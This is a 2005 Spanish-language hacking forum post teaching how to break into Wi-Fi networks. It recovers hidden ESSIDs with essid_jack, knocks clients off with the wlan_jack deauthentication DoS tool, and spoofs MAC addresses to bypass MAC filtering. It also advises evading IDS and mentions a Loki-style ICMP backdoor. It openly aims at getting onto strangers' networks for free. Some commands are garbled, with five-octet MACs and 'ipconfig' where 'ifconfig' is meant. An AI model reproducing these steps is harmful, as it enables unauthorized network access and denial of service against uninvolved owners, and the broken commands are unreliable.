www.hackxcrack.com :: Ver tema - Inseguridad: Essid cerrado y filtrado de MAC

Inseguridad: Essid cerrado y filtrado de MAC

Índice del Foro www.hackxcrack.com -> FORO GENERAL DE SEGURIDAD INFORMÁTICA

Autor

Mensaje

Rozór
Miembro HXC

Registrado: 22 Ago 2004
Mensajes: 35
Ubicación: Internet

Publicado: Martes, 30 Agosto 2005, 01:26 Título del mensaje: Inseguridad: Essid cerrado y filtrado de MAC

Inseguridad En Sistemas Inalambrico 001

1. Prologo
2. ESSID Cerrado y Filtrado de MAC
3. Cambiando la Mac.

-SUB_LEVEL By ROZOR-

1- Podeis colgar el articulo donde querais siempre y cuando no se retoque. Gracias Smile

Este articulo va pensado para personas que tenga una mínima idea de redes inalámbricas y protocolos TCP... Además esta orientado a Linux. Este articulo esta escrito por mi , recogiendo los conocimientos leyendo diferentes artículos y un libro de seguridad en redes inalámbricas. Espero que os guste y que os sirva. En este articulo no se tocan técnicas de seguridad, se tocan solo temas de inseguridad en otro que quiero pastear pronto aquí mismo, va a ser solo de seguridad en redes. Lo que sea escrito en consola ira de color verde. Dedicado a miseo, holer0, aakwall y DEREK_X

2- El ESSID: muchos routers inalámbricos, lo tienen abierto al publico, pero claro si nos lo cierran y no lo vemos sera un obstáculo mas, por que quien se va a imaginar que en un punto exacto va a ver una conexión con X nombre. Vamos a mandar un marco de desautentificación a las máquinas de la red, usaremos el Essid Jack.

Código:

rozor@Newsystem:~ # ./essid_jack -h
Essid Jack: Proof of concept so people will stop calling an ssid a password
Usage: ./essid_jack -b <bssid> [ -d <destination mac> [ -c <channel number> ] [ -i <interface name> ]

-b: bssid, the mac address of the access pint (e.g. 00:de:ad:be:ef:00)
-d: destination mac address, defaults to broadcast address
-c: channel number (1-14) that the access point is on, default to current.
-i: the name is AirJack interface to use ( defaults to aj0).

rozor@Newsystem:~ # essid_jack -b 00:4d:89:4a:69: -c 11
Got it, the essid is (escape characters are c style):
“Mise0W0rk”

En este caso solo podremos usarlo cuando haya varias máquinas. Tambien lo que suele pasar muchas veces es que dejan essid por defecto.

Ahora hablaremos del filtrado de mac, esto si es muy interesante por que muchos de los servidores wlan lo llevan integrado necesitas una autentificación vía MAC.

Si sabes la mac usas la suya cuando el equipo este off pero no es divertido, para ello vamos a usar el piggybacking.

Esta técnica se llama piggybacking. Vamos a necesitar hacer unos retoques antes como el desactivar los ARP y poner el firewall en modo paranoico. Ahora veremos los problemas y soluciones, tienes que tener cuidado con los paquetes eh información que mandas a la red, si no saltaran las alarmas y ya la has cagado. Para ello mandaremos muchos paquetes de reinicio TCP y de puertos ICMP inalcanzables, esto para que no se disparen los sistemas IDS. Tenemos que restringir nuestras comunicaciones ICMP. Vamos a usar una puerta trasera basada en ICMP al estilo Loki. Esto lo que hace es encapsular los datos de respuesta para que no . Ahora vamos a hacerlo pero claro esta si yo voy con mi cochecito, aparco veo una red , yo no tengo ganas de estar pasando calor como un cerdo y sin internet esperando a que desconecte . Smile

Le enviaremos un marco de desasociaciòn falsificando su MAC como si fuera la del punto de acceso. Ahora es cuando necesitamos o dos tarjetas o dos dispositivos para poder conectar, el cual usaremos como cliente, la configuraremos con la MAC de la máquina que queremos tirar y los parámetros pedidos. En ese instante estaremos OnLine . Ya hemos “phreakeado” un sistema inalámbrico.

Claro algunos como es normal se preguntara y como coño se hace una desasociación. Ahora mismo estoy rulando desde UBUNTU(megadistro debían). Vamos a usar el wlan_jack

Código:

rozor@Newsystem:~ # ./wlan_jack -h
Wlan Jack: 802.11b DOS attack
Usage: ./wlan_jack -b <bssid> [ -v <victim address> ] [ -c <channel number> ] [ -i <interface mode> ]
-b: bbssid the mac address of the access point (e.g. 00:de:ad:be:ef:00 )
-v: victim mac address, default broadcast address
-c: channel number (1-14) that the access point is on, default to current
-i: the name of the AirJack interface to use (default to aj0)

root@Nowsystem:~ # ./wlan_jack -b d0:5a:58:6d:2a -v 2a:4a:00:02:05 -c 11

Wlan Jack: 802.11 DOS utility.

Jacking Wlan...

3- Vamos a cambiar la mac address en Linux. Primero con ipconfig y despues con iproute. Esto no hace falta que se lo lea si sabe como hacerlo.

Código:

root@Nowsystem:~ # ipconfig wlan0 hw ether 05:08:5d:69:00
root@Nowsystem:~ # ip link set dev wlan0 address 05:08:5d:69:00

_________________

Death

-----

"" By Rozor

Volver arriba